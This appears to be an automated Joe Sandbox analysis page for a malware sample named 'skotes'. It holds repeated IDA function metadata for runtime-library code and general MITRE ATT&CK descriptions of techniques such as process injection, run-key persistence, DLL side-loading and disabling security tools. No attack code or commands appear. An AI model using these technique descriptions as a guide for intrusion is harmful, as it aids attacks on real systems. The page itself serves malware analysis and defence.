Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap__alloca_probe_16__freea
String ID: ZJ,mJ
API String ID: 809856575-3561173285
Opcode ID: 9698f50a104b2e795fdcf30012090760ecc874fb21bf775e90c926227e17e0b2
Instruction ID: 56449e4a5511f465689790f276322bce54631432c31c79364bf628e48d03ca5d
Opcode Fuzzy Hash: 9698f50a104b2e795fdcf30012090760ecc874fb21bf775e90c926227e17e0b2
Instruction Fuzzy Hash: 7131397290020AABDB219FA5CC41EEF7B64EF56310F04416AFD14A7241DB39CC55C7A8

Function 004A1704 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 004A1764
std::invalid_argument::invalid_argument.LIBCONCRT ref: 004A17AF

Strings

pContext, xrefs: 004A17A7

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: 3450b289f8445b852fc0e2759674514524c3e64c7dc75c53e560961f0112120e
Instruction ID: 5e8f07d8eac75b5a4c1ba60c682f1ccadf8c57549b57a346f5fe56dc9cfe17f8
Opcode Fuzzy Hash: 3450b289f8445b852fc0e2759674514524c3e64c7dc75c53e560961f0112120e
Instruction Fuzzy Hash: B711063EA002109BCB15FF68C485A6D7765AFA6364F14406BE81297362DB3CED01CBD9

Function 00490C5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 00490CD7
Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 00490D2A

Strings

p[M, xrefs: 00490CCF

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Resource$AcquireConcurrency::details::Concurrency::details::_Lock::_ManagerManager::Reentrant
String ID: p[M
API String ID: 3303180142-4203874544
Opcode ID: c4cc3f29807f188f9cb619b9b205259b93f7cd7a43f8600f39d3e8a69746791a
Instruction ID: 79a49b38950a236e5d57af80821ca1be89d4e2e232c87924b3c9e19772443a8d
Opcode Fuzzy Hash: c4cc3f29807f188f9cb619b9b205259b93f7cd7a43f8600f39d3e8a69746791a
Instruction Fuzzy Hash: 13019A70E066059EDF10ABFA656136D6FE0AF08308F60457FE445EB282CE3C9E41976E

Function 0049B92C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0049B94E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0049B961

Strings

pContext, xrefs: 0049B959

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 548886458-2046700901
Opcode ID: bde461d41925fab198f1ebf9715a26e604cfc675212e125f428f62b363632abc
Instruction ID: d9c601ea77e26f43da6be35c1aed233d8521893258e2436ec34d5a2257f3496d
Opcode Fuzzy Hash: bde461d41925fab198f1ebf9715a26e604cfc675212e125f428f62b363632abc
Instruction Fuzzy Hash: 1DE09B3DB00104A7CB04F7A5D849D9DBB799E95714714412FF511A3351EB78A905C6E8

Function 004934CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004934FC

Strings

pScheduler, xrefs: 004934F4
version, xrefs: 004934E1

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 2141394445-3154422776
Opcode ID: 348d4944b0515179f4c8c57879fad3842d38bafc3e5aa672f707afad9b8a556d
Instruction ID: 143da73a3babbe8e123f8ed92e5d9f5a910543074039438e331fea0e5d7894a5
Opcode Fuzzy Hash: 348d4944b0515179f4c8c57879fad3842d38bafc3e5aa672f707afad9b8a556d
Instruction Fuzzy Hash: 8DE08034440208B6CF25FF95D44BFCD7B54971274AF14C13BB811111929BBC5798C69D

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
